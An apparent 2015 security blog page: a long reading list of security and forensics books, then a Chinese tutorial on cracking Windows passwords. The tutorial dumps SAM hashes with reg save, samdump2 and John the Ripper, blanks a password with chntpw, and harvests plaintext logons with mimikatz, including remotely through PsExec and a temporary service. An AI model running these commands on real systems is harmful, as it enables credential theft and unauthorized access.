Tuesday, August 25, 2015

Learning Resource In Computer Security and Digital Forensic[Books]

Books
Security:
1.Computer Security Principle and Practice 2011
2.Engineering Security by Peter Gutmann 2013
3.Essential System administration 3rd edition
4.Introduction to Information Security. A Strategic-Based Approach (2014)
5.Security Engineering by Roose Andeson
6.Introduction to  Security and Network Forensic by William J.Buchanan
7.Corporate Computer and Network Security

Forensic Investigation:
1.Guide to Computer Forensics and Investigations (with DVD) 5th Edition by Bill Nelson
2.Digital Forensics with the AccessData Forensic Toolkit (FTK)|
3.Forensic Examination of Windows Supported File System by Doug Elrick
4.Computer Forensics with FTK by Fernando Carbone 
5.Official (ISC)2® Guide to the CCFP CBK-Auerbach Publications,CRC Press
6.EC-Council-Investigating Data and Image [Computer forensic]
7.The official CHFI study guide
8.Computer Forensics and Cyber Crime  An Introduction, 3rd Edition by Marjie T. Britz
9.Digital Evidence and Computer Crime, Third Edition Forensic Science, Computers, and the Internet-Academic Press
10.File System Forensic Analysis[must read]
11.Forensic with open source tools
12.Hacking Exposed Computer Forensic
13.Understand Forensic Digital Imaging

Operating System architecture and Attacks:
1.Writing security tools and exploits by James C Foster
2.A bug hunter's diary a guided tour through the wilds of software security
3.Buffer Overflow Attacks
4.The Art of Software Security Assesment
5.Organization and Architecture Designing for Performance(8th Edition)
6.Discovering Computer
7.Exploiting Software How To Break Code
8.Writing Security Tools and Exploits
9.The Architecture of Computer Hardware,System Software and Networking
10.Modern Operating System
11.How computer works

Penetration Testing:
1.Basic Security Testing with Kali Linux 2.Google hacking v1 and v2 
3.Gray Hat Hacking The Ethical Hackers Handbook, 4th Edition
4.Hacking: The Art of Exploitation, 2nd Edition
5.Metasploit: The Penetration Tester's Guide by Jim O'Gorman
6.Backtrack 5 Wireless Penetration Testing Beginner's guide
7.Instant Penetration Testing: Setting Up a Test Lab How-to
8.Backtrack 5 cook book /Backtrack 5 wirelsess penetration testing 9.Counter Hack Reloaded,2nd
10.A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers
11.Hacker Techniques, Tools and Incident
12.Black Hat Python: Python Programming for Hackers and Pentesters
13.Kali Linux- Assuring Security by Penetration Testing by Allen, Lee 14.Learning Metasploit Exploitation and Development by Balapure, Aditya
15.No starch Metasploit 16.Penetration Testing : A hands on guide to hacking
17.The hacker Playbok 1 and 2
18.Ethical hacking and Penetration Testing Guide

Assembly Language:
1.Introduction to 64 bit windows Assembly Programming Ray Seyfarth
2.Assembly Language for x86 Processors 6th Edition
3.Assembly Language Step by Step programming with Linux(must Read)
4.Professional AT & T Assembly Language
5.Introduction to assembly language programming for pentium and risc processors
6.KIP R. IRVINE-Assembly Language for x86 Processors-Pearson (must Read)
8.The Art of Assembly Language
9.Intel 64 and IA-32 Architectures Software Developer's Manual

Cryptography:
1.Cryptography and Network Security: Principles and Practice (6th Edition) by William Stallings
2.Applied Cryptography: Protocols, Algorithms and Source Code in C
3.Break the Code: Cryptography for Beginners
4.Introduction to Modern Cryptography, Second Edition (Chapman & Hall/CRC Cryptography and Network Security Series)
5.An Introduction to Mathematical Cryptography (Undergraduate Texts in Mathematics)
6.Cryptography: Theory and Practice, Third Edition (Discrete Mathematics and Its Applications)
7.Practical Cryptography
8.An Introduction to Number Theory with Cryptography
9.Implementing SSL / TLS Using Cryptography and PKI
10.Secure Programming Cookbook for C and C++: Recipes for Cryptography, Authentication, Input Validation & More(Must Read)
11.Cryptography Engineering: Design Principles and Practical Applications 1st Edition

12.Modern Cryptanalysis: Techniques for Advanced Code Breaking
13.Malicious Cryptography: Exposing Cryptovirology
14.Cryptanalysis of Number Theoretic Ciphers (Computational Mathematics)

15.A Course in Number Theory and Cryptography (Graduate Texts in Mathematics)
16.Beginning Cryptography With Java(must Read)
17.Algorithmic Cryptanalysis (Chapman & Hall/CRC Cryptography and Network Security Series) 1st Edition
18.Applied Cryptanalysis - Breaking Ciphers in the Real World
19..BigNum Math - Implementing Cryptographic Multiple Precision Arithmetic
20.Codes - The Guide to Secrecy from Ancient to Modern Times
21.Cryptography for Developers

Reverse Engineering:
1.Sockets Shellcode Porting And Coding Reverse Engineering Exploits And Tool Coding For Security Professionals no secret
2.Reversing: Secrets of Reverse Engineering
3.Practical reverse engineering  x86, x64, ARM, Windows Kernel, reversing tools, and obfuscation-Wiley

Malware Analyst:
1.Advanced Malware Analysis by Christopher Elisan
2.Hacking Exposed :Malware and Rootkits
3.Predicting Malicious Behavior:Tools and Techniques for Ensuring  by Gary M.Jackson
4.Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software 5.The Rootkit Arsenal Escape and Evasion in the Dark Corners of the System, Second Edition
6.Malware Forensics Field Guide for Linux Systems  Digital Forensics Field Guides-Syngress (2014)
7.Malware Analyst Cookbook
8.Malware forensics Field guide for Windows Systems Digital Forensic Field Guides
9.Designing BSD rootkits an indtroduction to kernal hacking
10.Rookts Subverting the Windows Kernel
11.The Art of Memory Forensic Detecting Malware and Threats in Windows,Mac and Linux memory 

Linux and Shell Code:
1.CompTIA Linux+ Study Guide Exams (2013)
2.The Shellcoder's Handbook: Discovering and Exploiting Security Holes by Chris Anley
3. UNIX and Linux System Administration Handbook, 4th Edition
4.Linux Command line and shell scripting bible
5.Linux Kernal Development 3rd
6.A practical Guide to Linux Command,Editor and Shell Scripting
7. Linux Command Line and Shell Scripting Bible
8.Understand The Linux Kernel
9.How Linux Works What Every Superuser Should Know
10.Linux+ Guide to Linux Certification 3rd
11.Linux Bible 2013
12.Linux Fundamental by Paul Cobbaut
13.Linux in a nutshell
14.Linux System Programming

Linux Forensic:
1.Linux Forensics by Philip Polstra

Database Forensic:
1.The Database Hacker handbook
2.The Manga Guide to Database
3.Digital Image Forensics: There is More to a Picture than Meets the Eye

Windows Forensic:
1.Advance windows debugging by Mario Hewardt
2.Windows PowerShell Cookbook
3.Windows Registry Forensics Advance by Harlan Carvey
4.Windows 8.1 Bible
5.Windows 8.1 inside out
6.Hacking Exposed Windows 3rd Edition
7.Windows Forensic Analysis Toolkit. Advanced Analysis Techniques for Windows 8
8.Windows Forensic Analysis Toolkit, Advanced Analysis Techniques for Windows 7
9.Windows Sysinternals Administrator's Reference  -Microsoft Press
10.Microsoft Windows Operating System Essentials by Tom Carpenter
11.Windows Internals(Part 1 and 2)
12.Windows Server 2012 R2 Inside Out, Configuration, Storage, & Essentials-Microsoft Press

Mac Forensic:
Will update Soon

Mobile Forensic:
1.Android Security Internals
2.Mobile Forensic Investigation: A guide to Evidence collection, analysis and presentation by Lee Reiber
3.Iphone and ios forensic by Andrew Hoong
4.Android Malware and Analysis-Auerbach Publications by Ken Dunham
5.Ios Forensic Analysis by Sean Morrissey
6.Iphone forensics:recovering evidences by Jonathan Zdziarski

Network Forensic
1.Network Attacks and Exploitation :A frame work by Matthew Monte
2.Wireshark for Security pro:Using wireshark and the metasploit framework Jessey Bullock
3.Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Gordon Fyodor Lyon
4.Wireshark Network Analysis, Second Edition by LauraChappel
5.The Tao of Network Security Monitoring: Beyond Intrusion Detection
6.Practical Packet Analysis:Using Wireshark to Solve Real-World Network Problems, 2nd Edition  -No Starch Press (2011)
7.Cisco Networking Essentials
8.Hands on hacking and Network defence infosec
9.Modern Wireless attack
10.Network Forensics Tracking Hackers through Cyberspace
11.Nmap Cookbook:The Fat-free Guide to Network Scanning
12.Mastering Windows Network Forensics and Investigation
13. WireShark101

Web Attack:
1.SQL Injection Attacks and Defense, Second Edition
2.The Web Application Hacker's Handbook, Second Edition
3.The Tangled Web:A guide To Securing Modern Web Applications
4.XSS Exploits Cross Site Scripting Attacks and Defense
5.Web Application Obfuscation
6.The Web Application Hackers Handbook
7.Hacking Expose Web 2.0

Programming:
1.Python Forensic by Chet hosmer
2.Hacker Disassembling Uncovered: Powerful Techniques To Safeguard Your Programming
3.Gray Hat Python: Python Programming for Hackers and Reverse Engineers
4.Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers by TJ O'Connor

Privacy and Data Hiding
1.Hiding from the Internet: Eliminating Personal Online Information
2.Hacking Web Intelligence: Open Source Intelligence and Web Reconnaissance Concepts and Techniques
3.Personal Digital Security: Protecting Yourself from Online Crime
4.Tor and the Dark Art of Anonymity: How to Be Invisible from NSA Spying
5.Social Engineering in IT Security: Tools, Tactics, and Techniques by Sharon Conheady 6.Darknet: A Beginner's Guide to Staying Anonymous Online

















































Monday, August 17, 2015

Crack Windows Password Part 2 : SAM File with Kali Linux

什么是SAM文件?
SAM(Security Account Manager)是Windows系統以HASH方式儲存用戶密碼的地方。
而被存儲HASH的格式NTLM,位置則是在C:\windows\system32\config\SAM。

使用Kali Linux & Windows 讀取SAM的步驟:Samdump2的方式
1. 由於Windows預設無法直接複製,刪除和移動SAM,Security 以及SYSTEM,因此,我寫了一個.Bat 文件來複製SAM文件。

2.Try.bat 文件程式碼如下:
@echo off
reg SAVE HKLM\SAM C:\SAM
reg SAVE HKLM\SYSTEM C:\SYSTEM
reg SAVE HKLM\SECURITY C:\SECURITY
exit

4.當3個File 複製完畢後,就可以把這3個File drag 到Kali Linux 的Desktop 裡面[我選擇儲存在Chapter2文件裡]。

5.之後用 samdump2 SYSTEM SAM > pikachu,txt 將SAM 文件轉換成txt 文件形式。

6.通過John the Ripper 工具,可以使用John --show 讓pikachu,txt 裡面的所有Hash全部呈現出來。




7.最後用OP crack 或者Online NTLM Cracker  來將hash 轉換會原來的文字就大功告成了。
原本電腦密碼為:Banana

使用Kali Linux & Windows 讀取SAM的步驟: 重置系統密碼
1.Live Boot Kali Linux
2,進入C:Drive 複製3個File(SYSTEM ,SECURITY and SAM)
3.輸入chntpw -l SAM, 會顯示SAM裡面所有用戶的資料。
4.輸入chantpw -u "bluebear171" SAM 後,你可以更換/清空用戶電腦密碼。
5. 選擇1,清空密碼
6. q for Exit


附加神器:mimikatz 2.0 目前支持所有Windows系統(Windows10  can
介紹:此工具能直接從Isass.exe直接獲取Windows處於Active狀態賬號的明文密碼。亦能配合Metasploit 使用。
下載地址:http://blog.gentilkiwi.com/mimikatz

步驟如下:
1. Open Mimikatz.exe (32/64bit) with Admin
權限
2.
提升權限 privilege::debug
3.
注入dll inject::process lsass.exe sekurlsa.dll
4. 提取密碼:sekurlsa::logonpasswords 
密碼不到1秒鐘就顯示出來


5. Module sekurlsa 參考表
6. 遠程終端的方式
Needed Files
a
mimikatz_trunktoolsPsExec.exe
b)  mimikatz_trunkWin32mimikatz.exe
c)  
mimikatz_trunkWin32sekurlsa.dll


1. PsExec.exe 启动
2.运行 cmd.exe,或者直接运行 mimikatz.exe
psexec -s cmd.exe
3启动 mimikatz.exe
C:\mimikatz_trunk\Win32\mimikatz.exe
4.提升权
privilege::debug
5.//注入dll,(可以有空格)
inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
6.//抓取密


@getLogonPasswords
7.exit

*******************************************************
//创建服务方
sc create getpassword binpath= "cmd.exe /c c:\xxx\mimikatz.exe < command.txt > password.txt"
sc start getpassword
sc delete getpassword